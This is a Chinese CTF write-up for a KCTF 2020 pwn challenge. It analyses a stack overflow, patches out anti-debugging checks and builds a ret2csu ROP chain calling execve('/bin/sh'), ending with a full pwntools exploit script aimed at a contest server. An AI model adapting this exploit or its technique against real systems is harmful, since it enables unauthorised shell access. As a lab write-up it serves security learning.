-
-
[原创]看雪2020 KCTF秋季赛 第九题 命悬一线writeup
-
2020-12-8 19:08 6851
-
第九题 命悬一线
一、序
1 | 命悬一线?PWN! |
二、题目分析
1、看到题目后,先上checksec,可以发现题目为64位程序,未开PIE,说明代码段、数据段地址固定。
1 2 3 4 5 6 7 | root@ubuntu: / mnt / hgfs / ShareDir / ctf / pwn1 # checksec pwn1 [ * ] '/mnt/hgfs/ShareDir/ctf/pwn1/pwn1' Arch: amd64 - 64 - little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE ( 0x400000 ) |
2、静态分析下程序,漏洞点很明显,读入0x200大小,而只memset 0x60的空间,存在栈溢出漏洞。
3、接下来动态调试下,可以发现一些反调试
1 2 3 | # (cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h) 查看系统调用号 sub_400CA8()有ptrace反调试,patch处理掉。 init_array中调用到sub_400E08()时,可以看到检查了sub_400E82()的结果,而sub_400E82()中原逻辑为返回TracerPid。如果检查不通过的话,系统调用sub_4017CC()方法将被更改...。解决方法有很多,我这边是在sub_400E82()中patch返回值为 0 ,绕过检查。 |
三、利用
1、总结一下分析结果,64位,暂时没泄露出地址,存在栈溢出漏洞可输入0x200长度字符,NO-PIE的情况。敏感的同学已经感觉到通用gadget的召唤了吧,原理这里不再赘述,有需要的同学请移步。
2、ROPgadget找一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | # 0x000000000040185b最长最牛,我们去他附近找找。 root@ubuntu: / mnt / hgfs / ShareDir / ctf / pwn1 # ROPgadget --binary pwn1 --only "pop|ret" Gadgets information = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = 0x000000000040185c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 0x000000000040185e : pop r13 ; pop r14 ; pop r15 ; ret 0x0000000000401860 : pop r14 ; pop r15 ; ret 0x0000000000401862 : pop r15 ; ret 0x000000000040185b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 0x000000000040185f : pop rbp ; pop r14 ; pop r15 ; ret 0x0000000000400a20 : pop rbp ; ret 0x0000000000400b60 : pop rbx ; pop rbp ; ret 0x0000000000401863 : pop rdi ; ret 0x0000000000401861 : pop rsi ; pop r15 ; ret 0x000000000040185d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret 0x000000000040028c : ret 0x0000000000401757 : ret 0x1be 0x0000000000400c32 : ret 0x458b 0x0000000000400f07 : ret 0x858b 0x0000000000400c55 : ret 0x8b48 0x0000000000400da5 : ret 0xbe |
3、果然有货啊...,0x401840、0x40185A处发现通用gadget,记录下来便于后续利用。
4、栈溢出要解决的第一个问题是canary,那么如何解决呢?
1 | 经过测试,我们运行输入一段长度溢出的数据,动态调试断点执行到 0x40169E ,可以发现另一个利用点。总结一下就是,程序会把栈上一个地址的值保存到rax寄存器中,通过一番简单的赋值操作可以call一个指针指向的地址。而保存在栈上这个值是我们可以溢出覆盖到的,那么就意味着我们可以通过控制该值来调用任意一个指针指向的地址。如果能找到一个合适的指针就好了,该指针指向的任意地址也可以由我们控制,那就简单了。 |
5、寻找梦想指针
1 | 仔细观察同学们可以发现, 0x6020C0 完全满足我们的要求,该指针地址保存了我们所有的输入,而这些输入的数据我们都可以控制。 |
6、配合上面通用gadget的方法,控制syscall(0x4017cc),构造一个execve("/bin/sh", NULL, NULL)
1 2 3 | # call execve 系统调用号为59 ,控制后两个参数为0 root@ubuntu: / mnt / hgfs / ShareDir / ctf / pwn1 # cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h | grep execve #define __NR_execve 59 |
7、系统调用syscall(0x4017cc)处寄存器赋值小坑
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | # payload构造如下,常规的通用gadget利用方式不细说了,点上文传送阵学习,这里提一个点,需要一点小窍门绕过去 def csu(rbx, rbp, r12, r13, r14, r15, last): # pop rbx,rbp,r12,r13,r14,r15 # rbx should be 0, # rbp should be 1,enable not to jump # r12 should be the function we want to call # rdi=edi=r15d # rsi=r14 # rdx=r13 payload = '' payload + = p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) payload + = p64(csu_front_addr) payload + = '/bin/sh\x00' + 'A' * 0x28 payload + = p64(last) return payload # 就是execve需要三个参数,而我们此时只能控制两个参数(常规通用gadget方式只能控制rdi、rsi、rdx三个寄存器,无法控制rcx) # 调用号 rdi=edi=r15d=59 call execve # 第一个参数rsi = r14 = 0x602120 (保存了/bin/sh) # 第二个参数rdx = r13 = 0 # !!我们这里需要控制第三个参数 rcx = 0 才能满足execve("/bin/sh", NULL, NULL)的条件 # 解决办法就是在内存中找到一个地址是# xor rcx, rcx; ret; 构造变形一下通用gadget的利用方式 在调用execve前 使rcx为0 syscall = 0x4017CC payload = p64(syscall) + p64(csu_end_addr) + 'A' * 8 payload + = p64(xor_rcx_ret_addr) + p64(csu_end_addr) payload + = csu( 0 , 1 , 0x6020C0 , 0 , 0x602120 , 59 , main_addr) payload + = 'A' * 8 payload + = p64( 0x6020C8 - 0x18 ) |
四、完整EXP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 | #coding:utf8 #!python #!/usr/bin/env python from pwn import * context.terminal = [ 'gnome-terminal' , '-x' , 'sh' , '-c' ] context.log_level = "debug" elfpath = '/mnt/hgfs/ShareDir/ctf/pwn1/pwn1' elf = ELF(elfpath) if len (sys.argv) = = 0 : p = process(elfpath, env = { 'LD_PRELOAD' : '/lib/x86_64-linux-gnu/libc.so.6' }, timeout = 2 ) else : p = remote( '121.36.145.157' , 9999 ) csu_front_addr = 0x401840 csu_end_addr = 0x40185A main_addr = 0x400AB6 xor_rcx_ret_addr = 0x4017E3 # xor rcx, rcx; ret; def csu(rbx, rbp, r12, r13, r14, r15, last): # pop rbx,rbp,r12,r13,r14,r15 # rbx should be 0, # rbp should be 1,enable not to jump # r12 should be the function we want to call # rdi=edi=r15d # rsi=r14 # rdx=r13 payload = '' payload + = p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) payload + = p64(csu_front_addr) payload + = '/bin/sh\x00' + 'A' * 0x28 payload + = p64(last) return payload syscall = 0x4017CC payload = p64(syscall) + p64(csu_end_addr) + 'A' * 8 payload + = p64(xor_rcx_ret_addr) + p64(csu_end_addr) payload + = csu( 0 , 1 , 0x6020C0 , 0 , 0x602120 , 59 , main_addr) # call __NR_execve 59 (cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h | grep execve) payload + = 'A' * 8 payload + = p64( 0x6020C8 - 0x18 ) # getshell p.send(payload) p.interactive() |
1 | flag{b5f4e9d4325d16d55783f7ea1b1ed956} |
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
赞赏
看原图